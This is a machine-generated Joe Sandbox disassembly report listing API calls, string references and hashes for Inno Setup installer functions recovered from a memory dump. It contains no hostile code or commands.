                                                                                  • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                  • API String ID: 2051275411-1862435767
                                                                                  • Opcode ID: 094f14b588af688cd7db8b552fab67cbd0f69cfd9e563acb8ae8cd2159047a0a
                                                                                  • Instruction ID: 3217153a075e29e22e4edd5f99a32045657764684ff44c5b21fe10df6120cd58
                                                                                  • Opcode Fuzzy Hash: 094f14b588af688cd7db8b552fab67cbd0f69cfd9e563acb8ae8cd2159047a0a
                                                                                  • Instruction Fuzzy Hash: 28411770A00308ABDB10EFD5C842BDEB7F9AF45705F50407FA904BB292DF799A098B59
                                                                                  APIs
                                                                                  • OffsetRect.USER32(?,00000001,00000001), ref: 0044D21D
                                                                                  • GetSysColor.USER32(00000014), ref: 0044D224
                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0044D23C
                                                                                  • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D265
                                                                                  • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D26F
                                                                                  • GetSysColor.USER32(00000010), ref: 0044D276
                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0044D28E
                                                                                  • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D2B7
                                                                                  • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D2E2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Text$Color$Draw$OffsetRect
                                                                                  • String ID:
                                                                                  • API String ID: 1005981011-0
                                                                                  • Opcode ID: 0c9f13fdac39b7e8032be21cb884e4f523a93d5be2f974ed7a515f91e2df11ad
                                                                                  • Instruction ID: bddce6b53f256ac6c171d17b767d3a31006e7acd236a538b09f11432ecbe9b7c
                                                                                  • Opcode Fuzzy Hash: 0c9f13fdac39b7e8032be21cb884e4f523a93d5be2f974ed7a515f91e2df11ad
                                                                                  • Instruction Fuzzy Hash: 6921AFB42015047FC710FB6ACD8AE8B7BDC9F19319B01857AB918EB392C678DE404669
                                                                                  APIs
                                                                                    • Part of subcall function 004509A0: SetEndOfFile.KERNEL32(?,?,0045C3EA,00000000,0045C575,?,00000000,00000002,00000002), ref: 004509A7
                                                                                    • Part of subcall function 00406F60: DeleteFileA.KERNEL32(00000000,0049C628,00498DC9,00000000,00498E1E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F6B
                                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496C5D
                                                                                  • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496C71
                                                                                  • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00496C8B
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00496C97
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00496C9D
                                                                                  • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00496CB0
                                                                                  Strings
                                                                                  • Deleting Uninstall data files., xrefs: 00496BD3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                  • String ID: Deleting Uninstall data files.
                                                                                  • API String ID: 1570157960-2568741658
                                                                                  • Opcode ID: 1ff474fed9ee097c96215d717bbe635fc8fb99da6ef0c3667258a19916fdf94b
                                                                                  • Instruction ID: 97c3483cac018c5983fbae276c25bca061d0eb7c138ea963c76b2828a35483b6
                                                                                  • Opcode Fuzzy Hash: 1ff474fed9ee097c96215d717bbe635fc8fb99da6ef0c3667258a19916fdf94b
                                                                                  • Instruction Fuzzy Hash: A0215371704204BFEB11EB7AED42B263BA8D75975CF52443BB501971A2D67CAC01CB2D
                                                                                  APIs
                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48
                                                                                  • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004704F1,?,?,?,?,00000000), ref: 0047045B
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004704F1), ref: 00470472
                                                                                  • AddFontResourceA.GDI32(00000000), ref: 0047048F
                                                                                  • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004704A3
                                                                                  Strings
                                                                                  • Failed to open Fonts registry key., xrefs: 00470479
                                                                                  • Failed to set value in Fonts registry key., xrefs: 00470464
                                                                                  • AddFontResource, xrefs: 004704AD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                  • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                  • API String ID: 955540645-649663873
                                                                                  • Opcode ID: 4d906fac6dccdf438760750c8da522a8f943409b0e1b4cd23829c8425d47f062
                                                                                  • Instruction ID: 7097c2831d41c9cd2ca76b8e30f6fd32102657c6dd1fb14c708e758a2e1a6bb0
                                                                                  • Opcode Fuzzy Hash: 4d906fac6dccdf438760750c8da522a8f943409b0e1b4cd23829c8425d47f062
                                                                                  • Instruction Fuzzy Hash: 6421C770741204BBD710EA669C42FAE679DDB54704F50843BBA04FB3C2D67CAE05466D
                                                                                  APIs
                                                                                    • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                    • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                    • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
                                                                                  • GetVersion.KERNEL32 ref: 00462F08
                                                                                  • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462F46
                                                                                  • SHGetFileInfo.SHELL32(00462FE4,00000000,?,00000160,00004011), ref: 00462F63
                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 00462F81
                                                                                  • SetCursor.USER32(00000000,00000000,00007F02,00462FE4,00000000,?,00000160,00004011), ref: 00462F87
                                                                                  • SetCursor.USER32(?,00462FC7,00007F02,00462FE4,00000000,?,00000160,00004011), ref: 00462FBA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                  • String ID: Explorer
                                                                                  • API String ID: 2594429197-512347832
                                                                                  • Opcode ID: 96f263f28a0c5ccb9cf997cde3498094f1a70322a781246ee7820a3eb8b88b0c
                                                                                  • Instruction ID: e6c52dcece90e3493be9f15e0e64570b8c3e052e326357339ba6e8db1b4e70e7
                                                                                  • Opcode Fuzzy Hash: 96f263f28a0c5ccb9cf997cde3498094f1a70322a781246ee7820a3eb8b88b0c
                                                                                  • Instruction Fuzzy Hash: 80210A707447047AE714BB758D87F9A76989B04708F4004BFB609EE1C3DAFC9805966D
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02122BD4,?,?,?,02122BD4,00478970,00000000,00478A8E,?,?,?,?), ref: 004787C5
                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004787CB
                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BD4,?,?,?,02122BD4,00478970,00000000,00478A8E,?,?,?,?), ref: 004787DE
                                                                                  • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BD4,?,?,?,02122BD4), ref: 00478808
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,02122BD4,00478970,00000000,00478A8E,?,?,?,?), ref: 00478826
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                  • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                  • API String ID: 2704155762-2318956294
                                                                                  • Opcode ID: c594ba596ff371defbe1f19e99b7548ca8d88db220ed669b2209c8c709b6289d
                                                                                  • Instruction ID: b4b4eb6e882b21a3e38edc8c56477b2b3cf7b2a6488eba7606f3a3958a626299
                                                                                  • Opcode Fuzzy Hash: c594ba596ff371defbe1f19e99b7548ca8d88db220ed669b2209c8c709b6289d
                                                                                  • Instruction Fuzzy Hash: A101D6717C470436E52035AB4C8AFBB654C8B50769F65813F7A5CEA2C2DEAC8D0601AF
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000000,0045A036,?,00000000,00000000,00000000,?,00000006,?,00000000,00497F35,?,00000000,00497FD8), ref: 00459F7A
                                                                                    • Part of subcall function 00454468: FindClose.KERNEL32(000000FF,0045455E), ref: 0045454D
                                                                                  Strings
                                                                                  • Stripped read-only attribute., xrefs: 00459F3C
                                                                                  • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459F54
                                                                                  • Failed to strip read-only attribute., xrefs: 00459F48
                                                                                  • Failed to delete directory (%d). Will retry later., xrefs: 00459F93
                                                                                  • Deleting directory: %s, xrefs: 00459F03
                                                                                  • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459FEF
                                                                                  • Failed to delete directory (%d)., xrefs: 0045A010
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseErrorFindLast
                                                                                  • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                  • API String ID: 754982922-1448842058
                                                                                  • Opcode ID: 108d6f8d37026f2bdf90fc188fb77551ed7727444c0280258668295353b09f4f
                                                                                  • Instruction ID: f7c933924608f42955d773fda0cc7ecec7f056cd1af039b488d7310b1683b7b3
                                                                                  • Opcode Fuzzy Hash: 108d6f8d37026f2bdf90fc188fb77551ed7727444c0280258668295353b09f4f
                                                                                  • Instruction Fuzzy Hash: 2741AF30A142459ACB14DF6988013AEBAA59F4970AF50867BAC05D73C3CB7D8D1DC75E
                                                                                  APIs
                                                                                  • GetCapture.USER32 ref: 00422EB4
                                                                                  • GetCapture.USER32 ref: 00422EC3
                                                                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
                                                                                  • ReleaseCapture.USER32 ref: 00422ECE
                                                                                  • GetActiveWindow.USER32 ref: 00422EDD
                                                                                  • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
                                                                                  • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
                                                                                  • GetActiveWindow.USER32 ref: 00422FCF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                  • String ID:
                                                                                  • API String ID: 862346643-0
                                                                                  • Opcode ID: 68a87140416b020399d93bb5315a0a21c376da3895e44649e19dd4425ce1cb21
                                                                                  • Instruction ID: 5ea5fd569023dc8c87c0f060f2033c8effa86d07781bc97308b393d06b21a190
                                                                                  • Opcode Fuzzy Hash: 68a87140416b020399d93bb5315a0a21c376da3895e44649e19dd4425ce1cb21
                                                                                  • Instruction Fuzzy Hash: 42414F70B00254AFDB10EB69DA82B9E77F1EF48304F5540BAF500AB292D7B89E40DB58
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 0042949A
                                                                                  • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                                                    • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                                                  • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 004294CE
                                                                                  • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                                                  • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                                                  • String ID:
                                                                                  • API String ID: 1583807278-0
                                                                                  • Opcode ID: f653b88d646d5855613b637c91f02c053f26aae7c72922398ebfcd233ccf026a
                                                                                  • Instruction ID: 697d7c7282338d87a55ab62dd7e79ac53eeb01c5e9ca74f61c727bf968a75029
                                                                                  • Opcode Fuzzy Hash: f653b88d646d5855613b637c91f02c053f26aae7c72922398ebfcd233ccf026a
                                                                                  • Instruction Fuzzy Hash: 4B01E1517087113AF311767A8CC2F6F65C8CB48348F44043AFA46963D3D96C9C81872A
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 0041DE37
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE41
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041DE4E
                                                                                  • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                                                  • GetStockObject.GDI32(00000007), ref: 0041DE6B
                                                                                  • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                                                  • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                                                  • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectStock$CapsDeviceIconLoadRelease
                                                                                  • String ID:
                                                                                  • API String ID: 225703358-0
                                                                                  • Opcode ID: acbeab26448ca7b360d039afddd60c8d357067f60e495a2bdddab1aa7473d77b
                                                                                  • Instruction ID: 417a648a5fb8aa5baf3b27a45d37177240889d53830a96f1de9ccb55acdbe8d0
                                                                                  • Opcode Fuzzy Hash: acbeab26448ca7b360d039afddd60c8d357067f60e495a2bdddab1aa7473d77b
                                                                                  • Instruction Fuzzy Hash: D0113D706443015AE340FFA65992BAA3690EB24709F00913FF609AF3D1DA7E1C849B6E
                                                                                  APIs
                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 004633EC
                                                                                  • SetCursor.USER32(00000000,00000000,00007F02,00000000,00463481), ref: 004633F2
                                                                                  • SetCursor.USER32(?,00463469,00007F02,00000000,00463481), ref: 0046345C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$Load
                                                                                  • String ID: $ $Internal error: Item already expanding
                                                                                  • API String ID: 1675784387-1948079669
                                                                                  • Opcode ID: f6d1be44cf2e44268d7afd95b077db9a3be558b3ec252d02f0fd4fc7ed4407db
                                                                                  • Instruction ID: 22b4a0b3887aba48b6836ac3fd128682d97f720243347cd6184d65e00a263647
                                                                                  • Opcode Fuzzy Hash: f6d1be44cf2e44268d7afd95b077db9a3be558b3ec252d02f0fd4fc7ed4407db
                                                                                  • Instruction Fuzzy Hash: A1B1A230A00284EFDB21DF29C545B9ABBF0AF04305F1585AEE8459B792D778EE44CB5A
                                                                                  APIs
                                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E8B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileStringWrite
                                                                                  • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                  • API String ID: 390214022-3304407042
                                                                                  • Opcode ID: 45615c73439ce270b6d05ccbf14361c73deff9410c1a8f3f205c5696ea4c069e
                                                                                  • Instruction ID: b3c584f0f22674ad0fcc633aedcec79f77295145a47899f9a0f541d7d967d7d4
                                                                                  • Opcode Fuzzy Hash: 45615c73439ce270b6d05ccbf14361c73deff9410c1a8f3f205c5696ea4c069e
                                                                                  • Instruction Fuzzy Hash: 9191F534E001099BDF11EFA5D881BDEB7F5EF4834AF508466E900B7292D7789E49CA58
                                                                                  APIs
                                                                                  • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 004770E5
                                                                                  • SetWindowLongW.USER32(00000000,000000FC,00477040), ref: 0047710C
                                                                                  • GetACP.KERNEL32(00000000,00477324,?,00000000,0047734E), ref: 00477149
                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0047718F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassInfoLongMessageSendWindow
                                                                                  • String ID: COMBOBOX$Inno Setup: Language
                                                                                  • API String ID: 3391662889-4234151509
                                                                                  • Opcode ID: 521d6e489fa1ae24faf8f78c129860c497e4f80b4a302989467673be046d20e0
                                                                                  • Instruction ID: 5e09237f06f7ca82dbad2e96fb5083c0fe5e5e2331f930e3c55d8b81a1e05678
                                                                                  • Opcode Fuzzy Hash: 521d6e489fa1ae24faf8f78c129860c497e4f80b4a302989467673be046d20e0
                                                                                  • Instruction Fuzzy Hash: 67814F30A042059FCB10DF69C985A9AB7F1FB49304F9481BAEC08EB362D734AD41CB99
                                                                                  APIs
                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,00408978,?,?,?,?,00000000,00000000,00000000,?,0040997F,00000000,00409992), ref: 0040874A
                                                                                    • Part of subcall function 00408578: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049C4C0,00000001,?,00408643,?,00000000,00408722), ref: 00408596
                                                                                    • Part of subcall function 004085C4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087C6,?,?,?,00000000,00408978), ref: 004085D7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale$DefaultSystem
                                                                                  • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                  • API String ID: 1044490935-665933166
                                                                                  • Opcode ID: 70ae38f132fc3d3f9053d40cb900b3f5106e9b3c11c1bc8091f0af349ffabeb6
                                                                                  • Instruction ID: 31fd29742738ad3ef4a1c8f63862b88eefe7a444323e1968e1f56601496a4ee9
                                                                                  • Opcode Fuzzy Hash: 70ae38f132fc3d3f9053d40cb900b3f5106e9b3c11c1bc8091f0af349ffabeb6
                                                                                  • Instruction Fuzzy Hash: 55512D74B001486BDB01FBA69D91AAE77A9DB94308F50D47FA181BB3C6CE3CDA05871D
                                                                                  APIs
                                                                                  • GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
                                                                                  • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
                                                                                    • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
                                                                                  • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
                                                                                    • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
                                                                                  • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
                                                                                  Strings
                                                                                  Memory Dump Source
